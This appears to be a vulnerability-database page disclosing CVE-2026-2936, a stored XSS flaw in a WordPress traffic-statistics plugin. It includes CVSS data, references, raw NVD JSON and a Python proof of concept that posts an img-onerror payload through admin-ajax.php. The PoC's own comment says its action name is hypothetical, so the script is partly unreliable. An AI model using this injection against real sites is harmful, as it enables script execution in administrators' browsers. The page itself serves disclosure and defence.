Security Vulnerability Report

CVE-2026-2936

Published: 2026-04-04 12:16:03
Last Modified: 2026-04-24 18:13:29

Description

The Visitor Traffic Real Time Statistics plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'page_title' parameter in all versions up to, and including, 8.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever an admin user accesses the Traffic by Title section.

CVSS Details

- CVSS Score: 7.2
- Severity: HIGH
- CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No CPE configuration data available.

Affected product: Visitor Traffic Real Time Statistics <= 8.4 (all versions up to and including 8.4, per the description)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# PoC for CVE-2026-2936
# This script demonstrates the injection of a payload via the 'page_title' parameter.
import requests

target_url = "http://example.com"

# Proof-of-concept payload: pops an alert box when the stored title is rendered unescaped
payload = "<img src=x onerror=alert('XSS')>"

# The vulnerable endpoint is often part of the traffic tracking mechanism.
# Attackers send a request with the crafted page_title.
endpoint = f"{target_url}/wp-admin/admin-ajax.php"
data = {
    "action": "vtrts_update_stats",  # Hypothetical action name based on plugin functionality
    "page_title": payload,
}

try:
    response = requests.post(endpoint, data=data, timeout=10)
    if response.status_code == 200:
        print("[+] Request accepted; payload may have been stored.")
        print("[+] Wait for an administrator to view the 'Traffic by Title' section.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")
```

References

- https://plugins.trac.wordpress.org/changeset/3466230/visitors-traffic-real-time-statistics (plugin changeset, per the record's references)
- https://www.wordfence.com/threat-intel/vulnerabilities/id/bd8e86b0-5e06-44e0-a94c-b05581f46e5a?source=cve (Wordfence advisory, per the record's references)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-2936",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-04T12:16:03.090",
    "lastModified": "2026-04-24T18:13:28.877",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Visitor Traffic Real Time Statistics plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'page_title' parameter in all versions up to, and including, 8.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever an admin user accesses the Traffic by Title section."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/changeset/3466230/visitors-traffic-real-time-statistics",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/bd8e86b0-5e06-44e0-a94c-b05581f46e5a?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```